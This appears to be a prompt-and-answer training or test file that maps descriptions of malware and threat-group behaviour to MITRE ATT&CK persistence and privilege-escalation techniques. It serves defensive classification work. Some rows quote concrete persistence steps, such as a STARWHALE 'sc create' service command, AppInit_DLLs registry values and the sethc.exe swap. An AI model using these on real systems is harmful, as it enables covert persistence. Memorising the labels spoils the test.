+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kwampirs creates a new service named WmiApSrvEx to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner can automatically launch a Linux virtual machine as a service at startup if the AutoStart option is enabled in the VBoxVmService configuration file.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind installs itself as a new service with automatic startup to establish persistence. The service checks every 60 seconds to determine if the malware is running; if not, it will spawn a new instance.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Naid creates a new service to establish.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can create a service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nerex creates a Registry subkey that registers a new service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nidiran can create a new service named msamger (Microsoft Security Accounts Manager).,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub has created a Windows service named `WmdmPmSp` to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja can create the services `httpsvc` and `w3esvc` for persistence .,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To establish persistence, Okrum can install itself as a new service named NtmSsvc.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora has the ability to gain system privileges through Windows services.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull has the ability to install itself as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PipeMon can establish persistence by registering a malicious DLL as an alternative Print Processor which is loaded when the print spooler service starts.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX can be added as a service to establish persistence. PlugX also has a module to change service configurations as well as start, control, and delete services.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy creates a Registry subkey that registers a new service. PoisonIvy also creates a Registry entry modifying the Logical Disk Manager service to point to a malicious DLL dropped to disk.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PsExec can leverage Windows services to escalate privileges from administrator to SYSTEM with the -s argument.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can remotely create a temporary service on a target host.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has created a service when it is installed on the victim machine.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has used sc.exe to create a new service for the VirtualBox driver.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use services to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RawPOS installs itself as a service to maintain persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Reaver installs itself as a new service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can establish persistence by creating a new service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has created a service on victim machines named ""TaskFrame"" to establish persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= ""cmd.exe /c cscript.exe c:\\windows\\system32\\w7_1.wsf humpback_whale"" start= ""auto"" obj= ""LocalSystem""`.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARUSH has created a service named `Service1` for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Sakula samples install themselves as services for persistence by calling WinExec with the net start argument.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can create a service at `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost` to trigger execution and maintain persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt is capable of installing itself as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon creates a new service named “ntssrv” to execute the payload. Newer versions create the ""MaintenaceSrv"" and ""hdv_725x"" services.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has installed a Windows service to maintain persistence on victim machines.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has created new services and modified existing services for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet uses a driver registered as a boot start service as the main load-point.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can create a service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If running as administrator, TDTESS installs itself as a new service named bmwappushservice to establish persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEARDROP ran as a Windows service from the c:\windows\syswow64 folder.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME variants can add malicious DLL modules as new services.TYPEFRAME can also delete services from the victim’s machine.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle can run in memory and register its payload as a Windows service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot can install as a Windows service for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has registered a service, typically named `WerFaultSvc`, to decrypt and find a kernel driver and kernel driver loader to maintain persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has registered itself as a system service in the Registry for automatic execution at system startup.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some Volgmer variants also install .dll files as services with names generated by a list of hard-coded strings.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WannaCry creates the service ""mssecsvc2.0"" with the display name ""Microsoft Security Center (2.0) Service.""","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker created and established a service that runs until the encryption process is complete.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wiarp creates a backdoor through which remote attackers can create a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wingbird uses services.exe to register a new autostart service named ""Audit Service"" using a copy of the local lsass.exe file.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib creates Registry keys to allow itself to run as various services.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZeroT can add a new service to ensure PlugX persists on the system when delivered as another payload onto the system.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell can create a new service using the service parser function ProcessScCommand.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT can create a new service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: hcdLoader installs itself as a service for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell has established persistence by adding itself as a new service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has placed a plist file within the LaunchDaemons folder and launched it manually.,"Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore can persist via a LaunchDaemon.,"Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER will create a daemon for timed check-ins with command and control infrastructure.,"Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls can establish persistence via a Launch Daemon.,"Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can add a plist file in the `Library/LaunchDaemons` to establish persistence.,"Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner adds plist files with the naming format com.[random_name].plist in the /Library/LaunchDaemons folder with the RunAtLoad and KeepAlive keys set to true.,"Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If running with root permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder /Library/LaunchDaemons.","Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the /Library/LaunchDaemons/ folder with the RunAtLoad key set to true establishing persistence as a Launch Daemon.","Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.","Tecnique: T1543.004 Create or Modify System Process: Launch Daemon, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pacu can set up S3 bucket notifications to trigger a malicious Lambda function when a CloudFormation template is uploaded to the bucket. It can also create Lambda functions that trigger upon the creation of users, roles, and groups.","Tecnique: T1546 Event Triggered Execution, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has a HWP document stealer module which changes the default program association in the registry to open HWP documents.,"Tecnique: T1546.001 Event Triggered Execution: Change Default File Association, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process.,"Tecnique: T1546.001 Event Triggered Execution: Change Default File Association, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer can establish persistence through the system screensaver by configuring it to execute the malware.,"Tecnique: T1546.002 Event Triggered Execution: Screensaver, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Ghost, APT29 used WMI event subscriptions to establish persistence for malware.","Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used a WMI event filter to invoke a command-line event consumer at system boot time to launch a backdoor with `rundll32.exe`.","Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used WMI event subscriptions for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8 has used WMI event subscriptions for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used WMI event subscriptions for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used WMI for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metador has established persistence through the use of a WMI event subscription combined with unusual living-off-the-land binaries such as `cdb.exe`.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda's custom ORat tool uses a WMI event consumer to maintain persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rancor has complied VBScript-generated MOF files into WMI event subscriptions for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used WMI event filters and consumers to establish persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can use WMI event subscriptions for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT can use WMI event subscriptions to create persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can compile randomly-generated MOF files into the WMI repository to persistently run malware.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY uses a WMI event subscription to establish persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERTON can use WMI for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 has the ability to persist on a system using WMI events.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RegDuke can persist using a WMI consumer that is launched every time a process named WINWORD.EXE is started.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can create a WMI Event to execute a payload for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic can use a WMI event filter to invoke a command-line event consumer to gain persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrailBlazer has the ability to use WMI for persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: adbupd can use a WMI script to achieve persistence.,"Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain registered a WMI event subscription consumer called ""hard_disk_stat"" to establish persistence.","Tecnique: T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.","Tecnique: T1546.004 Event Triggered Execution: Unix Shell Configuration Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.,"Tecnique: T1546.004 Event Triggered Execution: Unix Shell Configuration Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When executing with non-root level permissions, RotaJakiro can install persistence by adding a command to the .bashrc file that executes a binary in the `${HOME}/.gvfsd/.profile/` folder.","Tecnique: T1546.004 Event Triggered Execution: Unix Shell Configuration Modification, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.,"Tecnique: T1546.007 Event Triggered Execution: Netsh Helper DLL, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 used sticky-keys to obtain unauthenticated, privileged console access.","Tecnique: T1546.008 Event Triggered Execution: Accessibility Features, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 replaces the Sticky Keys binary C:\Windows\System32\sethc.exe for persistence.,"Tecnique: T1546.008 Event Triggered Execution: Accessibility Features, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 leveraged sticky keys to establish persistence.,"Tecnique: T1546.008 Event Triggered Execution: Accessibility Features, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Axiom actors have been known to use the Sticky Keys replacement within RDP sessions to obtain persistence.,"Tecnique: T1546.008 Event Triggered Execution: Accessibility Features, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.,"Tecnique: T1546.008 Event Triggered Execution: Accessibility Features, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used sticky keys to launch a command prompt.,"Tecnique: T1546.008 Event Triggered Execution: Accessibility Features, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe.","Tecnique: T1546.008 Event Triggered Execution: Accessibility Features, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY can establish using a AppCertDLLs Registry key.,"Tecnique: T1546.009 Event Triggered Execution: AppCert DLLs, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used malware to set LoadAppInit_DLLs in the Registry key SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows in order to establish persistence.,"Tecnique: T1546.010 Event Triggered Execution: AppInit DLLs, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some variants of Cherry Picker use AppInit_DLLs to achieve persistence by creating the following Registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ""AppInit_DLLs""=""pserver32.dll""","Tecnique: T1546.010 Event Triggered Execution: AppInit DLLs, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key.,"Tecnique: T1546.010 Event Triggered Execution: AppInit DLLs, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If a victim meets certain criteria, T9000 uses the AppInit_DLL functionality to achieve persistence by ensuring that every user mode process that is spawned will load its malicious DLL, ResN32.dll. It does this by creating the following Registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs – %APPDATA%\Intel\ResN32.dll and HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs – 0x1.","Tecnique: T1546.010 Event Triggered Execution: AppInit DLLs, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has used application shim databases for persistence.,"Tecnique: T1546.011 Event Triggered Execution: Application Shimming, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pillowmint has used a malicious shim database to maintain persistence.,"Tecnique: T1546.011 Event Triggered Execution: Application Shimming, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.","Tecnique: T1546.011 Event Triggered Execution: Application Shimming, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat has installed shim databases in the AppPatch folder.,"Tecnique: T1546.011 Event Triggered Execution: Application Shimming, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
